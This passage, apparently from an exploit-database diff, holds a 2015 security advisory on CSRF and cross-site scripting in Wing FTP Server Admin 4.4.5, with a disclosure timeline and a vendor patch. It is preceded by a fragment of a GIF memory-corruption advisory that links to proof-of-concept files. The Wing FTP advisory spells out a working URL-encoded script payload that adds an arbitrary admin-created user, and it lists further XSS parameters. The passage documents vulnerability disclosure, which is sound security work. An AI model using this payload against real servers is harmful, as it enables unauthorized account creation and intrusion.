#####################################################################################
============================
3) Technical details
============================
A memory corruption occured within the LZW algorithm that is used to decode GIF. A specifically crafted GIF could lead to a controled memory corruption.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-05.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36859.pdf
###############################################################################

View file

@ -0,0 +1,133 @@
Document Title:
===============
Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities
Release Date:
=============
2015-04-28
apparitionsec ID (AS-ID):
====================================
AS-WFTP0328
Common Vulnerability Scoring System:
====================================
Overall CVSS Score 8.9
Product:
===============================
Wing FTP Server is a Web based administration FTP client that supports
following protocols FTP, FTPS, HTTPS, SSH
Advisory Information:
==============================
Security researcher John Page discovered a CSRF & client-side cross site
scripting web vulnerability within Wing FTP Server Admin that allows adding
arbitrary users to the system.
Vulnerability Disclosure Timeline:
==================================
March 28, 2015: Vendor Notification
March 28, 2015: Vendor Response/Feedback
April 19, 2015: Vendor Notification
April 28, 2015: Vendor released new patched version 4.4.6
April 28, 2015: Public Disclosure - John Page
Affected Product(s):
====================
Wing FTP Server Admin 4.4.5
Product: Wing FTP Server - Admin
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
Request Method(s):
[+] POST & GET
Vulnerable Product:
[+] Wing FTP Server Admin 4.4.5
Vulnerable Parameter(s):
[+] domain & type
Affected Area(s):
[+] Server Admin
Proof of Concept (POC):
=======================
The CSRF and client-side cross site scripting web vulnerability can be
exploited by remote attackers without privileged application user account
and with low user interaction (click). Payload will add arbitrary users to
the system.
POC: Example
http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES]
POC: Payload(s) Add arbitrary user to the system:
http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemas
ks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E
POC XSS:
http://localhost:5466/admin_viewstatus.html?domain=
POC XSS:
http://localhost:5466/admin_event_list.html?type=
Solution - Fix & Patch:
=======================
Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server)
Security Risk:
==============
The security risk of the CSRF client-side cross site scripting web
vulnerability in the `domain` admin_loglist.html value has CVSS Score of 8.9
Credits & Authors:
==================
John Page ( hyp3rlinx ) - ISR godz @apparitionsec
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. the security research reporter John Page disclaims all
warranties, either expressed or implied, including the warranties of
merchantability and capability for a particular purpose. apparitionsec or
its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits or special
damages.
Domains: hyp3rlinx.altervista.org